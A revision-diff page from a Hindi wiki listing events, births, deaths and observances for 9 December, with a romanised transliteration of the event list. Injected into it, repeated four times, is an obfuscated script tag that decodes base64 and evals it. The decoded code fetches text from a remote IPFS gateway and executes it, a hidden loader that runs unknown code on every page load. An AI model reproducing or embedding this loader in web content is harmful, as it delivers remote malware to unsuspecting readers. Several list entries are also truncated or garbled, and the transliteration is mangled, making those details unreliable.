Difference between revisions of "9 दिसंबर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(30 intermediate revisions by 11 users not shown)
Line 4: Line 4:
  
 
==9 दिसंबर की महत्त्वपूर्ण घटनाएँ==
 
==9 दिसंबर की महत्त्वपूर्ण घटनाएँ==
 +
* [[2013]] - इंडोनेशिया में बिनटारो के समीप ट्रेन हादसे में सात की मौत और 63 घायल।
 +
* [[2012]] - मेक्सिको में विमान दुर्घटनाग्रस्त होने से सात लोगों की मौत।
 +
* [[2011]]- आग की लपटों और ज़हरीले धुएं से घिरे कोलकाता के एएमआरआई (आमरी) अस्पताल में [[रम्या और विनीथा|'रम्या राजन' और 'पी.के. विनीथा']] ने मानवता और बहादुरी की अतुलनीय मिसाल पेश की। अपनी जान की परवाह न करते हुए दोनों ने आठ मरीज़ों को सुरक्षित निकाल लिया, पर एक अन्य मरीज़ को बचाने के प्रयास में उनकी मौत हो गई।
 +
* [[2008]]- इसरो ने [[यूरोप]] के प्रसिद्ध उपग्रह प्रणाली विशेषज्ञ ईएडीएम एस्ट्रीयस के लिए सेटेलाइट का निर्माण किया।
 +
* [[2007]] - पूर्व प्रधानमंत्री बेनजीर भुट्टो ने पाकिस्तानी सरकार के साथ अपने सभी सम्बन्ध समाप्त करने की घोषणा की।
 +
* [[2006]] - पाकिस्तान ने परमाणु क्षमता युक्त मध्यम दूरी के प्रक्षेपास्त्र 'हत्फ़-3 ग़ज़नवी' का परीक्षण किया।
 +
* [[2003]] - [[रूस]] में मास्को के मध्य भाग में विस्फोट से छह लोगों की मौत और कई घायल।
 +
* [[2002]] - जॉन स्नो अमेरिका के नये वित्तमंत्री बने।
 +
* [[2001]] - यूनाइटेड नेशनल पार्टी के नेता रानिल विक्रमसिंघे ने श्रीलंका के प्रधानमंत्री पद की शपथ ली; तालिबान में नार्दन एलांयस का विमान दुर्घटनाग्रस्त, 21 मरे।
 +
* [[2000]] - दक्षिण कोरिया का दर्जा विकासशील देश से बढ़कर विकसित देश किया गया।
 
* [[1998]] - [[रूस]] द्वारा आर्कटिक सागर में अपक्रांतिक परमाणु परीक्षण किया गया, आस्ट्रेलियाई क्रिकेट खिलाड़ियों शेन वार्न और मार्क वॉ ने एक भारतीय सट्टेबाज़ से 1994 में पाकिस्तान दौदे पर रिश्वत लेने की बात स्वीकारी।  
 
* [[1998]] - [[रूस]] द्वारा आर्कटिक सागर में अपक्रांतिक परमाणु परीक्षण किया गया, आस्ट्रेलियाई क्रिकेट खिलाड़ियों शेन वार्न और मार्क वॉ ने एक भारतीय सट्टेबाज़ से 1994 में पाकिस्तान दौदे पर रिश्वत लेने की बात स्वीकारी।  
* [[2000]] - दक्षिण कोरिया का दर्जा विकासशील देश से बढ़कर विकसित देश किया गया।
+
* [[1992]] - प्रिंस चार्ल्स और प्रिंसेस डायना ने अलग होने की औपचारिक रूप से घोषणा की।
* [[2001]] - यूनाइटेड नेशनल पार्टी के नेता रानिल विक्रमसिंघे ने श्रीलंका के प्रधानमंत्री पद की शपथ ली; तालिबान में नार्दन एलांयस का विमान दुर्घटनाग्रस्त, 21 मरे।
+
* [[1946]] - संविधान सभा की पहली बैठक नयी [[दिल्ली]] के कांस्टीट्यूनल हॉल में हुई।
* [[2008]]- इसरो ने [[यूरोप]] के प्रसिद्ध उपग्रह प्रणाली विशेषज्ञ ईएडीएम एस्ट्रीयस के लिए सेटेलाइट का निर्माण किया।
+
* [[1941]] - [[चीन]] ने [[जापान]], [[जर्मनी]] और [[इटली]] के खिलाफ युद्ध की घोषणा की।
 +
* [[1931]] - जापानी सेना ने चीन के जेहोल प्रांत पर हमला किया।
 +
* [[1924]] - हालैंड और हंगरी के बीच व्यापार संधि पर हस्ताक्षर।
 +
* [[1917]] - जनरल अलेनबाय के नेतृत्व में ब्रिटिश सेना ने यरुशलम पर क़ब्ज़ा किया।
 +
* [[1910]] - फ्रांसीसी सेनाओं ने मोरक्को के [[बंदरगाह]] शहर अगादीर पर क़ब्ज़ा किया।
 +
* [[1898]] - बेलूर मठ की स्थापना।
 +
* 1873 - हिज एक्सेलेंसी जार्ज बैरिंग वायसराय तथा भारत के गवर्नर जनरल ने 'म्योर कॉलेज' की आधारशिला रखी।
 +
* 1762 - ब्रिटिश संसद ने पेरिस संधि को स्वीकार किया।
 +
* 1625 - हालैंड और इंग्लैंड के बीच सैन्य संधि पर हस्ताक्षर।
 +
 
 
==9 दिसंबर को जन्मे व्यक्ति==
 
==9 दिसंबर को जन्मे व्यक्ति==
* [[1929]] - [[रघुवीर सहाय]], [[हिन्दी]] के साहित्यकार व पत्रकार
+
* [[1961]] - [[आदित्य चौधरी]] - 'भारतकोश' (www.bharatkosh.org) और 'ब्रजडिस्कवरी' (www.brajdiscovery.org) के संस्थापक एवं प्रधान सम्पादक हैं।
 +
* [[1946]] - [[सोनिया गाँधी]] - प्रसिद्ध भारतीय राजनीतिज्ञ एवं पूर्व प्रधानमंत्री [[राजीव गाँधी]] की पत्नी।
 +
* [[1945]] - [[शत्रुघ्न सिन्हा]] - [[हिन्दी]] फ़िल्मों की प्रसिद्ध अभिनेता।
 +
* [[1929]] - [[रघुवीर सहाय]], [[हिन्दी]] के साहित्यकार व पत्रकार।
 +
* [[1929]] - [[देवीदास ठाकुर]] - भारतीय राजनीतिज्ञ तथा [[असम]] के भूतपूर्व [[राज्यपाल]] थे।
 +
* [[1919]] - [[ई. के. नायनार]] - [[भारतीय कम्युनिस्ट पार्टी (मार्क्सवादी)]] के राजनीतिज्ञ थे, जो [[केरल]] के भूतपूर्व [[मुख्यमंत्री]] थे।
 +
* [[1918]] - [[कुशवाहा कान्त]] - [[भारत]] के जाने-माने उपन्यासकार और नाटककार।
 +
* [[1913]] - [[होमाई व्यारावाला]] - [[भारत]] की प्रथम महिला फ़ोटो पत्रकार।
 +
* [[1902]] - [[राब बटलर]] - एक प्रमुख ब्रिटिश रूढ़िवादी राजनीतिज्ञ थे।
 +
* [[1889]] - [[चन्द्रनाथ शर्मा]] - असम राज्य के प्रथम असहयोगी और [[असम]] में [[कांग्रेस]] के संस्थापकों में से एक।
 +
* [[1870]] - डाॅ. आई एस श्रुधर का वेल्लोर के अस्पताल।
 +
* 1825 - राव तुला राम -  सिपाही विद्रोह के एक प्रमुख नायक [[हरियाणा]] के रेवाड़ी जिले।
 +
* 1484 - [[सूरदास|संत सूरदास]] - महान् कवि।
 +
 
 
==9 दिसंबर को हुए निधन==
 
==9 दिसंबर को हुए निधन==
* [[2009]] - [[उस्ताद हनीफ मोहम्मद खाँ]], भारतीय [[तबला]] वादक।
+
* [[2020]] - [[मंगलेश डबराल]] - [[हिन्दी]] के प्रख्यात कवि, पत्रकार व [[साहित्य अकादमी पुरस्कार]] से सम्मानित साहित्यकार।
 +
* [[2009]] - [[उस्ताद हनीफ मोहम्मद खाँ]], भारतीय [[तबला वादक]]
 +
* [[2007]] - [[त्रिलोचन शास्त्री]] - प्रगतिशील काव्य धारा के प्रसिद्ध कवि।
 +
* [[2000]] - [[सचिन्द्र लाल सिंह]] - [[भारतीय राष्ट्रीय कांग्रेस]] के राजनीतिज्ञ तथा राजनेता थे।
 +
* [[1983]] - [[शाह नवाज़ ख़ान]] - '[[आज़ाद हिन्द फ़ौज]]' के अधिकारी थे।
 +
* [[1971]] - [[महेन्द्रनाथ मुल्ला]] - [[भारतीय नौसेना]] के जांबाज अफसरों में एक।
 +
* [[1942]] - [[द्वारकानाथ कोटणीस]] - दूसरे विश्वयुद्ध के दौरान [[चीन]] में निस्वार्थ सेवाएँ देते हुए जान देने वाले भारतीय डॉक्टर थे।
 +
* [[1924]] - [[गोविन्द सिंह राठौड़]] - [[भारत]] के जाबांज सैनिकों में से एक थे।
 +
* 1761 - [[ताराबाई]] - [[शिवाजी]] की पुत्री का पुणे।
  
 
==9 दिसंबर के महत्त्वपूर्ण अवसर एवं उत्सव==
 
==9 दिसंबर के महत्त्वपूर्ण अवसर एवं उत्सव==
 
+
* बालिका दिवस (भारत)
 +
* [[अखिल भारतीय हस्तशिल्प सप्ताह|अखिल भारतीय हस्तशिल्प सप्ताह (08-14 दिसम्बर)]]
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 +
* [http://www.univarta.com/history-of-the-day-09-december-2016/today-in-history/news/711320.html univarta.com]
 
{{कैलंडर बाहरी कड़ियाँ}}
 
{{कैलंडर बाहरी कड़ियाँ}}
  

Latest revision as of 16:45, 11 June 2021

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

gregori kailandar ke anusar 9 disanbar varsh ka 343 vaan (lip varsh mean yah 344 vaan) din hai. sal mean abhi aur 22 din shesh haian.

9 disanbar ki mahattvapoorn ghatanaean

  • 2013 - iandoneshiya mean binataro ke samip tren hadase mean sat ki maut aur 63 ghayal.
  • 2012 - meksiko mean viman durghatanagrast hone se sat logoan ki maut.
  • 2011- ag ki lapatoan aur zaharile dhuean se ghire kolakata ke eemaraee (amari) aspatal mean 'ramya rajan' aur 'pi.ke. vinitha' ne manavata aur bahaduri ki atulaniy misal pesh ki. apani jan ki paravah n karate hue donoan ne ath marizoan ko surakshit nikal liya, par ek any mariz ko bachane ke prayas mean unaki maut ho gee.
  • 2008- isaro ne yoorop ke prasiddh upagrah pranali visheshajn eeediem estriyas ke lie setelait ka nirman kiya.
  • 2007 - poorv pradhanamantri benajir bhutto ne pakistani sarakar ke sath apane sabhi sambandh samapt karane ki ghoshana ki.
  • 2006 - pakistan ne paramanu kshamata yukt madhyam doori ke prakshepastr 'hatf-3 gazanavi' ka parikshan kiya.
  • 2003 - roos mean masko ke madhy bhag mean visphot se chhah logoan ki maut aur kee ghayal.
  • 2002 - j aaun sno amerika ke naye vittamantri bane.
  • 2001 - yoonaited neshanal parti ke neta ranil vikramasianghe ne shrilanka ke pradhanamantri pad ki shapath li; taliban mean nardan elaanyas ka viman durghatanagrast, 21 mare.
  • 2000 - dakshin koriya ka darja vikasashil desh se badhakar vikasit desh kiya gaya.
  • 1998 - roos dvara arkatik sagar mean apakraantik paramanu parikshan kiya gaya, astreliyaee kriket khila diyoan shen varn aur mark v aau ne ek bharatiy sattebaz se 1994 mean pakistan daude par rishvat lene ki bat svikari.
  • 1992 - prians charls aur prianses dayana ne alag hone ki aupacharik roop se ghoshana ki.
  • 1946 - sanvidhan sabha ki pahali baithak nayi dilli ke kaanstityoonal h aaul mean huee.
  • 1941 - chin ne japan, jarmani aur itali ke khilaph yuddh ki ghoshana ki.
  • 1931 - japani sena ne chin ke jehol praant par hamala kiya.
  • 1924 - halaiand aur hangari ke bich vyapar sandhi par hastakshar.
  • 1917 - janaral alenabay ke netritv mean british sena ne yarushalam par qabza kiya.
  • 1910 - phraansisi senaoan ne morakko ke bandaragah shahar agadir par qabza kiya.
  • 1898 - beloor math ki sthapana.
  • 1873 - hij ekseleansi jarj bairiang vayasaray tatha bharat ke gavarnar janaral ne 'myor k aaulej' ki adharashila rakhi.
  • 1762 - british sansad ne peris sandhi ko svikar kiya.
  • 1625 - halaiand aur ianglaiand ke bich sainy sandhi par hastakshar.

9 disanbar ko janme vyakti

9 disanbar ko hue nidhan

9 disanbar ke mahattvapoorn avasar evan utsav

bahari k diyaan

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>